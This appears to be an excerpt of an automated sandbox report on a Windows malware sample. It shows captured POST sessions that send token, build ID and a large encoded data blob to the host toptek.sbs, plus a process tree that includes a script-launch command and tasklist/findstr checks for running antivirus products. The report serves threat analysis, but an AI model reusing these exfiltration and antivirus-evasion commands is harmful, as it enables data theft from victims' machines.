                                                                                                                                                                                                                                                                                  24192.168.2.44980794.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:10 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----LXLXT2689RQIEU3EUA1N
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 114841
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:10 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 58 4c 58 54 32 36 38 39 52 51 49 45 55 33 45 55 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 58 54 32 36 38 39 52 51 49 45 55 33 45 55 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 58 54 32 36 38 39 52 51 49 45 55 33 45 55 41 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------LXLXT2689RQIEU3EUA1NContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------LXLXT2689RQIEU3EUA1NContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------LXLXT2689RQIEU3EUA1NCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:10 UTC16355OUTData Raw: 38 66 2f 77 43 49 71 6e 69 4d 48 79 65 7a 35 6c 59 36 6c 68 38 5a 7a 2b 30 35 58 63 30 50 42 33 69 43 61 35 75 39 4b 30 4b 39 79 62 6d 79 75 33 4d 62 64 63 6f 49 5a 51 51 54 37 45 67 66 54 36 56 54 38 62 2f 38 6a 62 64 2f 37 73 66 2f 41 4b 41 74 61 6e 68 66 77 44 71 32 69 2b 49 37 54 55 62 71 34 73 33 69 68 33 37 68 47 37 6c 75 55 4b 6a 47 56 48 71 4f 39 5a 66 6a 66 2f 6b 62 62 7a 36 52 2f 77 44 6f 43 31 79 30 58 53 6c 6a 6b 36 54 75 72 50 37 39 54 54 47 4b 72 48 4c 6d 71 71 73 2b 5a 66 64 6f 63 39 53 55 74 46 65 30 66 4e 43 55 55 74 4a 54 41 31 50 44 66 2f 49 79 36 62 2f 31 38 4a 2f 4f 75 39 73 4a 42 5a 2f 45 76 56 6f 5a 76 6c 61 2b 74 6f 70 59 43 66 34 67 69 37 53 50 72 77 66 79 72 67 76 44 6e 2f 49 79 36 62 2f 31 38 70 2f 4f 76 55 50 45 50 68 2b 50 58
                                                                                                                                                                                                                                                                                  Data Ascii: 8f/wCIqniMHyez5lY6lh8Zz+05Xc0PB3iCa5u9K0K9ybmyu3MbdcoIZQQT7EgfT6VT8b/8jbd/7sf/AKAtanhfwDq2i+I7TUbq4s3ih37hG7luUKjGVHqO9Zfjf/kbbz6R/wDoC1y0XSljk6TurP79TTGKrHLmqqs+Zfdoc9SUtFe0fNCUUtJTA1PDf/Iy6b/18J/Ou9sJBZ/EvVoZvla+topYCf4gi7SPrwfyrgvDn/Iy6b/18p/OvUPEPh+PX
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:10 UTC16355OUTData Raw: 6a 52 61 63 34 79 75 33 30 73 53 49 31 7a 35 34 53 32 61 30 56 6e 55 6c 35 4c 71 42 4a 55 69 51 63 73 35 44 71 51 41 41 43 61 6f 70 34 68 2b 32 51 36 37 71 53 74 6f 2b 6c 57 38 64 78 61 51 32 73 74 35 59 4b 36 2b 55 66 4e 79 53 69 52 4e 68 32 32 67 6b 37 51 4f 32 51 41 4b 74 53 4e 64 71 73 69 32 72 32 34 57 5a 50 4c 6c 57 65 32 6a 6d 56 31 79 44 67 68 31 59 59 79 42 32 37 43 71 7a 52 36 68 6d 54 79 7a 70 69 52 79 68 4e 38 58 39 6d 32 35 6a 4a 54 4f 30 37 44 48 74 42 47 35 75 51 4d 38 31 77 59 33 44 56 36 74 52 75 47 32 6e 35 36 6e 71 5a 64 6a 4d 4e 52 70 63 74 52 36 75 2f 79 37 57 48 54 33 38 74 72 70 32 70 45 44 54 64 4f 6b 47 73 58 63 4b 32 39 39 62 69 65 52 6f 31 6a 6a 5a 55 52 31 6a 6b 41 78 75 2f 76 41 63 39 54 31 70 67 31 65 52 74 54 67 30 75 53 31
                                                                                                                                                                                                                                                                                  Data Ascii: jRac4yu30sSI1z54S2a0VnUl5LqBJUiQcs5DqQAACaop4h+2Q67qSto+lW8dxaQ2st5YK6+UfNySiRNh22gk7QO2QAKtSNdqsi2r24WZPLlWe2jmV1yDgh1YYyB27CqzR6hmTyzpiRyhN8X9m25jJTO07DHtBG5uQM81wY3DV6tRuG2n56nqZdjMNRpctR6u/y7WHT38trp2pEDTdOkGsXcK299bieRo1jjZUR1jkAxu/vAc9T1pg1eRtTg0uS1
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:10 UTC16355OUTData Raw: 41 68 61 53 69 69 67 59 55 55 55 55 77 46 7a 52 6e 6d 6d 30 76 76 53 43 77 37 50 71 4b 4d 67 30 32 69 69 77 72 45 56 39 2f 77 41 67 2b 54 2f 65 57 71 75 6d 66 65 6c 2b 67 71 7a 65 6e 2f 69 58 7a 66 56 66 35 31 56 30 77 2f 50 4a 39 42 56 78 2b 42 67 61 57 4b 42 6e 30 6f 7a 52 6d 73 78 43 30 55 41 2b 31 4c 6d 67 42 4d 63 55 55 75 66 72 52 6b 55 67 43 67 55 74 46 46 77 45 37 55 75 4b 44 53 30 67 75 4a 69 69 6c 78 52 6a 33 6f 45 4a 69 6a 46 4b 4b 58 46 41 44 63 55 74 4c 69 6c 78 51 46 78 6f 48 38 71 58 46 4c 69 6a 46 4b 34 67 37 31 65 30 37 37 38 32 50 2b 65 44 2f 77 41 71 70 67 56 65 30 37 2f 57 79 63 66 38 73 58 2f 6c 57 56 62 34 47 43 65 70 77 4d 6e 76 55 52 71 56 38 5a 71 49 39 4b 39 79 47 79 4f 75 49 68 35 70 70 36 55 76 57 6b 4e 57 57 68 70 70 70 39 66
                                                                                                                                                                                                                                                                                  Data Ascii: AhaSiigYUUUUwFzRnmm0vvSCw7PqKMg02iiwrEV9/wAg+T/eWqumfel+gqzen/iXzfVf51V0w/PJ9BVx+BgaWKBn0ozRmsxC0UA+1LmgBMcUUufrRkUgCgUtFFwE7UuKDS0guJiilxRj3oEJijFKKXFADcUtLilxQFxoH8qXFLijFK4g71e07782P+eD/wAqpgVe07/Wycf8sX/lWVb4GCepwMnvURqV8ZqI9K9yGyOuIh5pp6UvWkNWWhppp9f
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:10 UTC16355OUTData Raw: 4b 59 42 52 52 52 51 4d 4f 34 72 64 76 4f 4c 6e 2f 41 49 43 76 38 68 57 45 4f 6f 72 66 76 52 69 35 2f 77 43 41 72 2f 49 56 7a 31 66 6a 51 31 38 53 4b 31 46 4c 53 55 7a 51 44 52 52 52 51 4d 53 6c 6f 78 52 51 41 55 68 70 61 42 37 30 41 4e 35 6f 70 61 4b 41 45 78 7a 52 69 6e 55 6c 41 78 4d 55 47 6c 6f 78 51 42 48 50 2f 77 41 65 6c 78 2f 31 7a 50 38 41 4d 56 6e 36 5a 2f 78 38 50 2f 75 56 6f 33 48 2f 41 42 35 33 48 2f 58 50 2b 6f 72 4f 30 7a 2f 6a 34 66 38 41 33 4b 49 37 4d 44 54 6f 37 30 74 4b 42 69 67 42 74 48 74 54 71 54 46 41 43 55 59 70 77 46 42 6f 43 34 30 30 6f 46 46 4c 52 63 4c 69 55 55 74 41 46 41 44 63 63 55 74 4c 6a 69 6a 46 46 77 75 4a 69 6c 78 78 53 34 70 63 55 72 69 47 34 6f 70 32 4b 41 4b 4c 68 63 62 69 6c 70 32 4d 64 71 4d 55 72 68 63 51 43 72
                                                                                                                                                                                                                                                                                  Data Ascii: KYBRRRQMO4rdvOLn/AICv8hWEOorfvRi5/wCAr/IVz1fjQ18SK1FLSUzQDRRRQMSloxRQAUhpaB70AN5opaKAExzRinUlAxMUGloxQBHP/wAelx/1zP8AMVn6Z/x8P/uVo3H/AB53H/XP+orO0z/j4f8A3KI7MDTo70tKBigBtHtTqTFACUYpwFBoC400oFFLRcLiUUtAFADccUtLjijFFwuJilxxS4pcUriG4op2KAKLhcbilp2MdqMUrhcQCr
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:10 UTC16355OUTData Raw: 7a 53 2f 77 42 74 36 74 2f 30 45 37 33 2f 41 4c 2f 74 2f 6a 57 42 48 71 39 6e 63 61 51 4c 79 45 7a 78 7a 75 6e 32 6c 4c 61 51 68 69 4c 62 66 35 52 59 6b 4b 4d 6e 66 37 44 67 55 73 2b 70 57 38 46 6d 4c 34 79 4f 31 76 4b 42 44 44 47 48 55 53 47 34 48 33 31 50 48 43 67 66 4e 6e 48 52 6c 48 58 4e 59 2b 31 77 54 56 2b 52 62 32 32 57 35 31 76 44 35 6f 70 57 64 52 37 58 2b 4a 37 66 31 72 36 47 37 2f 62 57 71 2f 38 41 51 54 76 66 2f 41 68 2f 38 61 62 4a 71 32 70 53 78 74 48 4a 71 4e 34 36 4f 43 72 4b 30 37 45 45 48 71 43 4d 31 6e 4e 71 65 6b 71 4e 4e 57 61 4c 55 4c 61 54 55 4c 73 51 78 62 37 68 48 41 6a 7a 74 61 56 76 33 51 77 4e 78 41 48 72 68 75 6d 4f 61 6b 57 6f 4b 30 64 75 6b 38 68 74 35 70 5a 62 6a 65 53 41 52 48 46 41 68 61 56 73 64 7a 6e 67 44 49 79 56 49
                                                                                                                                                                                                                                                                                  Data Ascii: zS/wBt6t/0E73/AL/t/jWBHq9ncaQLyEzxzun2lLaQhiLbf5RYkKMnf7DgUs+pW8FmL4yO1vKBDDGHUSG4H31PHCgfNnHRlHXNY+1wTV+Rb22W51vD5opWdR7X+J7f1r6G7/bWq/8AQTvf/Ah/8abJq2pSxtHJqN46OCrK07EEHqCM1nNqekqNNWaLULaTULsQxb7hHAjztaVv3QwNxAHrhumOakWoK0duk8ht5pZbjeSARHFAhaVsdzngDIyVI
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:10 UTC16355OUTData Raw: 71 2b 39 31 30 2f 49 37 66 53 39 5a 30 50 77 7a 5a 61 64 34 61 61 35 74 37 75 48 55 46 63 36 6c 63 78 54 42 6b 6a 5a 78 74 41 44 41 34 41 48 51 2b 67 47 65 39 65 63 61 78 59 78 36 62 71 31 78 61 51 58 55 4e 31 43 6a 66 75 35 34 58 44 71 36 39 6a 6b 63 5a 78 31 48 72 58 6f 76 2f 43 6d 2f 77 44 71 50 66 38 41 6b 6e 2f 39 6e 51 76 77 63 47 34 62 74 64 4a 58 50 49 46 70 67 2f 38 41 6f 64 66 4b 4f 4d 6e 30 50 72 71 6d 48 78 46 53 4b 6a 79 62 62 61 6f 33 4e 52 30 64 35 76 47 36 58 6f 38 48 66 61 56 45 38 4c 66 32 70 2f 61 65 7a 47 41 76 7a 2b 56 6e 2b 48 48 54 76 74 39 36 66 34 52 73 62 71 32 31 57 56 35 2f 42 33 39 6a 4b 59 43 42 63 66 32 6d 4c 6a 63 64 79 2f 4a 74 48 54 50 58 50 74 37 31 32 64 46 61 32 52 36 6e 73 49 63 33 4e 62 58 30 58 2b 52 34 51 6e 2b 72
                                                                                                                                                                                                                                                                                  Data Ascii: q+910/I7fS9Z0PwzZad4aa5t7uHUFc6lcxTBkjZxtADA4AHQ+gGe9ecaxYx6bq1xaQXUN1Cjfu54XDq69jkcZx1HrXov/Cm/wDqPf8Akn/9nQvwcG4btdJXPIFpg/8AodfKOMn0PrqmHxFSKjybbao3NR0d5vG6Xo8HfaVE8Lf2p/aezGAvz+Vn+HHTvt96f4Rsbq21WV5/B39jKYCBcf2mLjcdy/JtHTPXPt712dFa2R6nsIc3NbX0X+R4Qn+r
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:10 UTC356OUTData Raw: 63 36 66 33 57 4f 63 6c 65 54 77 65 4f 61 54 2f 41 49 53 62 58 76 37 4e 2f 73 33 2b 32 39 53 2b 77 62 50 4c 2b 79 2f 61 35 50 4b 32 66 33 64 6d 63 59 39 73 55 57 48 63 37 50 34 67 57 55 64 70 34 4f 38 50 77 57 6a 32 62 32 4e 70 63 33 4e 76 43 38 46 33 44 4b 5a 52 69 4d 6c 7a 73 59 38 73 51 78 50 39 33 4b 67 34 34 7a 35 76 55 72 58 4d 37 32 38 64 75 38 30 6a 51 52 4d 7a 52 78 6c 69 56 51 6e 47 53 42 30 42 4f 42 6e 36 43 6f 71 61 56 68 45 6b 45 38 31 72 63 52 33 46 76 4b 38 4d 30 54 68 34 35 49 32 4b 73 6a 41 35 42 42 48 49 49 50 65 75 6c 73 66 48 6d 71 35 65 44 58 35 5a 2f 45 47 6e 53 41 62 37 50 55 4c 6c 33 41 59 66 64 5a 47 4a 4a 52 67 65 34 36 67 6b 48 72 58 4c 55 55 57 41 36 44 55 50 47 2f 69 58 55 66 50 6a 6b 31 71 39 69 74 5a 6c 4d 5a 73 37 65 64 34
                                                                                                                                                                                                                                                                                  Data Ascii: c6f3WOcleTweOaT/AISbXv7N/s3+29S+wbPL+y/a5PK2f3dmcY9sUWHc7P4gWUdp4O8PwWj2b2Npc3NvC8F3DKZRiMlzsY8sQxP93Kg44z5vUrXM728du80jQRMzRxliVQnGSB0BOBn6CoqaVhEkE81rcR3FvK8M0Th45I2KsjA5BBHIIPeulsfHmq5eDX5Z/EGnSAb7PULl3AYfdZGJJRge46gkHrXLUUWA6DUPG/iXUfPjk1q9itZlMZs7ed4
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:22:12 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  25192.168.2.44981394.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:14 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----VKFKNOH47GV37Y5F3OPH
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:14 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 56 4b 46 4b 4e 4f 48 34 37 47 56 33 37 59 35 46 33 4f 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 46 4b 4e 4f 48 34 37 47 56 33 37 59 35 46 33 4f 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 46 4b 4e 4f 48 34 37 47 56 33 37 59 35 46 33 4f 50 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------VKFKNOH47GV37Y5F3OPHContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------VKFKNOH47GV37Y5F3OPHContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------VKFKNOH47GV37Y5F3OPHCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:22:14 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  26192.168.2.44981994.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:16 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----NYCBIEUAAI5F37GVKNOZ
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:16 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 47 56 4b 4e 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 47 56 4b 4e 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 47 56 4b 4e 4f 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------NYCBIEUAAI5F37GVKNOZContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------NYCBIEUAAI5F37GVKNOZContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------NYCBIEUAAI5F37GVKNOZCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:22:17 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                  Start time:00:20:55
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\9EI7wrGs4K.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  File size:863'093 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:8EB4F92605E35C57A42B0917C221D65C
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                                  Start time:00:20:56
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                  Start time:00:20:56
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                  Start time:00:20:58
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                                                  Imagebase:0xdb0000
                                                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                  Start time:00:20:58
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                  Imagebase:0x30000
                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                  Start time:00:20:59
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                                                  Imagebase:0xdb0000
                                                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                  Start time:00:20:59
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                  Imagebase:0x30000
                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                  Start time:00:20:59
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:cmd /c md 245347
                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                                  Start time:00:20:59
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:findstr /V "profiles" Organizing
                                                                                                                                                                                                                                                                                  Imagebase:0x30000
                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
